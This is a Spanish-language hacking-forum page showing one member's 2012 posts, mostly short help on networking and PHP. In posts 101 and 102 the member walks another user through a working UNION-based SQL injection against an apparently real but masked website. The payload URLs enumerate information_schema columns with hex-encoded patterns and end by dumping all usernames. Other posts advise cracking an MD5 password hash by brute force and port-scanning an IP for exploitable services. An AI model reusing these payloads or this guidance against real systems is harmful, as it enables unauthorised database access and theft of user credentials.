elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14
101  Seguridad Informática / Nivel Web / Re: Vulnerabilidad URL SQL Injection en: 28 Septiembre 2012, 18:54 pm
Hola
En primer lugar disculpa porque releyendo me he dado cuenta que me he dejado el FROM xD

Tu URL debería de queda así
 www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(information_schema.columns.column_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+information_schema.columns.column_name like concat(0x25,0x75736572 ,0x25)

He modificado tu inyección con lo que te explicaba arriba.

Esto lo que debería de mostrar es todos los campos que contengan la palabra "user" (como nombre de campo)
Pero nada mas. Necesitamos saber en que tabla está cada campo (cada columna). Podemos utilizar el registro 3 para que nos lo muestre (todo esto está explicado en el tutorial)

Así pues modificamos la inyección


 www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(information_schema.columns.column_name),group_concat(information_schema.columns.table_name),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+information_schema.columns.column_name like concat(0x25,0x75736572 ,0x25)

Esto nos va a mostrar por un lado los campos (por ejemplo username) y sus tablas (por ejemplo usuarios)

Ahora ya podemos hacer la inyección que nos mostrará todos los usuarios (suponiendo que es el mismo schema)


 www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(usuarios.username),3,4,5,6,7,8,9,10,11,12+from usuarios

Esto te mostrará todos los usuarios..

Te aconsejo leer el tutorial y luego revisar eo. Si algo no te queda claro comentalo.



102  Seguridad Informática / Nivel Web / Re: Vulnerabilidad URL SQL Injection en: 28 Septiembre 2012, 15:28 pm
Buenas,

Lo que estás haciendo es:

where table_name = undefined (esa es la traducción ascii de los números que has puesto...)

Lo que creo es que no acabas de saber es como hacer la inyección en realidad.

column_name contiene nombres de campos, no sus registros en sí.

Por lo tanto si lo que quieres es buscar algo parecido a "admin" deberás primero buscar un campo que sea parecido a "user". Lo puedes realizar en hexadecimal, mucho más rapido.

group_concat(information_schema.columns.column_name) where information_schema.columns.column_name like %user%

Si tubieras que cambiar %user% por hexadecimal, utiliza concat().

Por ejemplo:

XXX like concat(0x25,0x75736572 ,0x25) //es hexadecimal, y equivale a %user%


Esto te debería de devolver todos los campos que contengan "user" como nombre de campo, a partir de aquí ya podrás buscar a que tabla pertenece ese campo y así indagar mejor.

Te adjunto un enlace de un documento que hice referente a SQL Injection bajo MySQL (de unas 50 páginas).

www.forohack.com/index2.php?Ver=Mensaje&Id=30977&WebOrigen=1

Salu2
103  Seguridad Informática / Criptografía / Re: ayuda con Hash password creo que MD5 en: 28 Septiembre 2012, 12:45 pm
Hola,

El segundo hash puede ser un md5, así que puedes probar con algún crackeador online (lo que hacen básicamente es una búsqueda en una DB) o bien, te descargas algún programa para crackearlo (backtrack ya tiene alguno) o te creas un programa que ataque el hash por diccionario y/o bruteforce.

www.google.com/search?q=md5+bruteforce&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

PD: Para el programa que se te cierra, posiblemente necesites tener una tarjeta ATI o nVidia como gráfica. (GPU)...
104  Seguridad Informática / Criptografía / Re: ayuda con Hash password creo que MD5 en: 28 Septiembre 2012, 02:03 am
Hola
No es md5 y tampoko parece ser nada codificado en b64.
Puedes darnos algun dato mas?
Salu2
105  Comunicaciones / Redes / Re: Problema para acceder a un server desde casa en: 24 Septiembre 2012, 19:25 pm
Hola as if
Pues al parecer es eso. Sólo saliendo desde la IP de la universidad puedes acceder.

La idea de dato000 no es mala. Si tienes permisos de administración en el equipo de la uni podrias intentar alguna cosilla con hamachi (dependerá del firewall)
Salu2
106  Programación / PHP / Re: ¿Por qué no me abre localhost en IE? en: 21 Septiembre 2012, 13:56 pm
Estoy de acuerdo minusfour. Puedes comentar todo lo que sea script?
Salu2
107  Seguridad Informática / Seguridad / Re: Que se puede hacer con una IP? en: 19 Septiembre 2012, 13:58 pm
Como una dirección IP al final es un sistema. Lo que puedes hacer con ella es "preguntar" que ofrece ese sistema. Es decir con un scanning de puerto hacia esa IP podriamos ver que servicios ofrece. Cada servicio es un programa (por resumir) que puede tener errores de programación y por lo tanto tu aprovecharte de este error para alguna finalidad.

Otra cosa que puedes hacer con una dirección IP es consultarla en un DNS o WHOIS y obtener asi mas info.

Salu2
108  Programación / PHP / Re: ayuda con select php y javascript en: 18 Septiembre 2012, 13:11 pm
Buf no he acabado de entender que problema es.
Pon partes de codigo y sobretodo que error te da.
Salu2
109  Comunicaciones / Redes / Re: Duda puerta de enlace -switch-routers en: 18 Septiembre 2012, 11:31 am
Hola,

Te recomiendo leer...
rfc-es.org/rfc/rfc1180-es.txt

A partir de la página 12

Salu2
110  Comunicaciones / Redes / Re: Problema para acceder a un server desde casa en: 18 Septiembre 2012, 08:42 am
Hola.
Pues si desde la universidad también pones la IP publica 161... Y te puedes conectar.. Tiene toda la pinta que solo la IP publica de la umiversidad tiene acceso quizá mas IPs)
Salu2
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines